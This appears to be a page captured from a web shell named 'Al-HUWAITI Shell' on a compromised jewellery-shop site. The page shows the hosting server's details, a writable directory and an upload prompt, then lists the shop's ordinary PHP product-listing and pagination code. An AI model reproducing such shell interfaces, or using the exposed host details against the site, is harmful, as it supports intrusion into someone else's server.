Al-HUWAITI Shell
Al-huwaiti


Server : LiteSpeed
System : Linux us-phx-web1202.main-hosting.eu 4.18.0-553.84.1.lve.el8.x86_64 #1 SMP Tue Nov 25 18:33:03 UTC 2025 x86_64
User : u615232177 ( 615232177)
PHP Version : 8.1.33
Disable Function : NONE
Directory :  /home/u615232177/domains/soniahjeweler.com/public_html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/u615232177/domains/soniahjeweler.com/public_html/shop.php
<?php session_start();
$page_name = basename($_SERVER['PHP_SELF']); 
include("header.php"); ?>
<title><?php echo $company_name; ?> - Shop</title>
<div class="col-md-12 col-xs-12" id="product_msg"></div>
<?php
//initialize filter session
if (!isset($_SESSION["filter_by"])){
	$_SESSION["filter_by"] = "default";
	$filter_by =" product_title";
	$selected_default="selected";
	$selected_highest="";
	$selected_lowest="";
}
else{
	if($_SESSION["filter_by"] == "default"){
		$filter_by =" product_title";
		$selected_default="selected";
		$selected_highest="";
		$selected_lowest="";
	}
	elseif($_SESSION["filter_by"] == "highest_price"){
		$filter_by =" product_price DESC";
		$selected_default="";
		$selected_highest="selected";
		$selected_lowest="";
	}
	elseif($_SESSION["filter_by"] == "lowest_price"){
		$filter_by =" product_price ASC";
		$selected_default="";
		$selected_highest="";
		$selected_lowest="selected";
	}
	else{
		$filter_by =" product_title";
		$selected_default="selected";
		$selected_highest="";
		$selected_lowest="";
		}
}
//form runs
if (isset($_GET["filter"])){
    
	$filter_form = mysqli_real_escape_string($con,$_GET['filter_by']);
	$_SESSION["filter_by"] = "$filter_form";
	
	if($_SESSION["filter_by"] == "default"){
		$filter_by =" product_title";
		$selected_default="selected";
		$selected_highest="";
		$selected_lowest="";
	}
	elseif($_SESSION["filter_by"] == "highest_price"){
		$filter_by =" product_price DESC";
		$selected_default="";
		$selected_highest="selected";
		$selected_lowest="";
	}
	elseif($_SESSION["filter_by"] == "lowest_price"){
		$filter_by =" product_price ASC";
		$selected_default="";
		$selected_highest="";
		$selected_lowest="selected";
	}
	else{
		$filter_by =" product_title";
		$selected_default="selected";
		$selected_highest="";
		$selected_lowest="";
		}
}
?>


        <!-- breadcrumb__start -->
        <div class="breadcrumb">
            <div class="container">
                <div class="row">
                    <div class="col-xl-12">
                        <div class="breadcrumb__title">
                            <h1>Shop</h1>
                            <ul>
                                <li>
                                    <a href="#">Home</a>
                                </li>
                                <li class="color__blue">
                                    Shop
                                </li>
                            </ul>
                        </div>
                    </div>
                </div>
            </div>
        </div>
         <!-- breadcrumb__end -->

    <!-- shop__section__start-->
        <div class="shop sp_top_80">
            <div class="container">
                <div class="row grid__responsive">
                   

                    <div class="col-xl-12 col-lg-12 col-md-12 col-sm-12 col-12">
                        <div class="shop__right__wraper">
                            
                            
                            <div class="shop__number text-right">
                              
                                </div>
                        </div>


                        <div class="tab-content " id="myTabContent">
                            <div class="tab-pane fade active show" id="projects__one" role="tabpanel" aria-labelledby="projects__one">
                                <div class="row grid__responsive">
                                <?php $cat_id="";
	$sql = "SELECT COUNT(product_id) FROM products WHERE old_price = 'Yes' ORDER BY $filter_by";
	$query = mysqli_query($con, $sql);
	$row = mysqli_fetch_row($query);
	//here we have the total row count
	$rows = $row[0];
	//number of results we want per page
	$page_rows = 24;
	//tells us the page number of our last page
	$last = ceil($rows/$page_rows);
	//this makes sure last cannot be less than 1
	if($last < 1){$last = 1;}
	//establish the page num variable
	$pagenum = 1;
	//Get pageum from $GET if it is present, else its 1
	if(isset($_GET['pn'])){
	$pagenum = preg_replace('#[^0-9]#', '', $_GET['pn']);
	}
	//below 1 or more than last page
	if($pagenum < 1){
	   $pagenum = 1;
	}else if ($pagenum > $last) {
		$pagenum = $last;
	}
	//this sets the range of rows to query for the chosen pagenum
	$limit = 'LIMIT ' .($pagenum - 1) * $page_rows .',' .$page_rows;
	//grabs one page worth of rows
	$sql = "SELECT * FROM products WHERE old_price='Yes' ORDER BY $filter_by $limit";
	$query = mysqli_query($con, $sql);
	//this shows the user what page they on and total number
	$textline1 = "Messages $rows";
	$textline2 = "Page $pagenum of $last";
	//establish the pagination controls
	$paginationCtrls = "";
	//if there is more than one page worth of results
	if($last != 1){
		if($pagenum > 1){
			$previous = $pagenum - 1;
			//$paginationCtrls .='<a href="'.$_SERVER['PHP_SELF'].'?pn='.$previous.'">Previous</a> &nbsp';
			//$paginationCtrls .='<li><a href="'.$_SERVER['PHP_SELF'].'?pn='.$previous.'">Prev</a></li>';
			$paginationCtrls .= "
      <li>
        <a class='prev' href=\"$_SERVER[PHP_SELF]?pn=$previous&id=$cat_id\">
          <i class='iconsax' data-icon='chevron-left'></i>
        </a>
      </li>
      ";
			//render clickable links to the left of target page number
			for($i = $pagenum-4; $i < $pagenum; $i++){
				if($i > 0){
					//$paginationCtrls .= '<a href="'.$_SERVER['PHP_SELF'].'?pn='.$i.'"></a> &nbsp; ';
					//$paginationCtrls .= '<li><a href="'.$_SERVER['PHP_SELF'].'?pn='.$i.'">'.$i.'</a></li>';
					$paginationCtrls .= "
          <li>
            <a href=\"$_SERVER[PHP_SELF]?pn=$i&id=$cat_id\">$i</a>
          </li>";
				}
			}
		}
		//render target number bt not link
		//$paginationCtrls .= ''.$pagenum.' &nbsp; ';
		$paginationCtrls .= '<li><a class="active" href="#">'.$pagenum.'</a></li>';
		//render clickable number links to the right of target number
		for($i = $pagenum+1; $i <= $last; $i++){
			//$paginationCtrls .= '<a href="'.$_SERVER['PHP_SELF'].'?pn='.$i.'">'.$i.'</a> &nbsp; ';
			//$paginationCtrls .= '<li><a href="'.$_SERVER['PHP_SELF'].'?pn='.$i.'">'.$i.'</a></li>';
			$paginationCtrls .= "
       <li>
        <a href=\"$_SERVER[PHP_SELF]?pn=$i&id=$cat_id\">$i</a>
      </i>
      ";
			
			if($i >= $pagenum+4){
				break;
			}
		}
		//this does the same as above, only checking if we are on the last page
		if($pagenum != $last) {
			$next = $pagenum + 1;
			//$paginationCtrls .= '<li><a href="'.$_SERVER['PHP_SELF'].'?pn='.$next.'">Next</a></li>';
			$paginationCtrls .= "
      <li>
        <a href=\"$_SERVER[PHP_SELF]?pn=$next&id=$cat_id\">
          <i class='iconsax' data-icon='chevron-right'></i>
        </a>
      </li>
      ";
		}
	}
	if(mysqli_num_rows($query) > 0){
		while ($row_back_deals = mysqli_fetch_array($query, MYSQLI_ASSOC)) {
			$product_id = $row_back_deals['product_id'];
			$product_title = $row_back_deals['product_title'];
			$product_price = $row_back_deals['product_price'];
			$product_desc = $row_back_deals['product_desc'];
			$product_image = $row_back_deals['product_image'];
			$new_tag = $row_back_deals['new'];
			$in_stock = $row_back_deals['in_stock'];
      $picture2 = $row_back_deals['picture2'];
			$product_cat = $row_back_deals['product_cat'];
            $stmt_cat = $con -> prepare('SELECT cat_title FROM categories WHERE cat_id = ?');   
            $stmt_cat -> bind_param('i',$product_cat);
            $stmt_cat -> execute();
            $stmt_cat -> store_result();
            $stmt_cat -> bind_result($cat_title_f);
            $stmt_cat -> fetch();

?>
                                    <div class="col-xl-3 col-lg-3 col-md-6 col-sm-6 col-6">
                                    <?php include("product_snippet.php"); ?>
                                    </div>
            
<?php									
		}
	}
	else{echo"Nothing found";}				
?>                                     
                                            
            
            
            
                                        </div>
                                    </div>
            

            
                                </div>
                            </div>
    
                           
    
                        
    
                        </div>


                        <div class="pagination__wraper text-center sp_top_40">
                        <ul>
                        <?php echo $paginationCtrls; ?>
                               
                               </ul>
                               <?php echo "$textline2"; ?>

                            
                        </div>


                    </div>
                </div>
            </div>
        </div>
    <!-- shop__section__start-->

<?php include("footer.php"); ?>

Al-HUWAITI Shell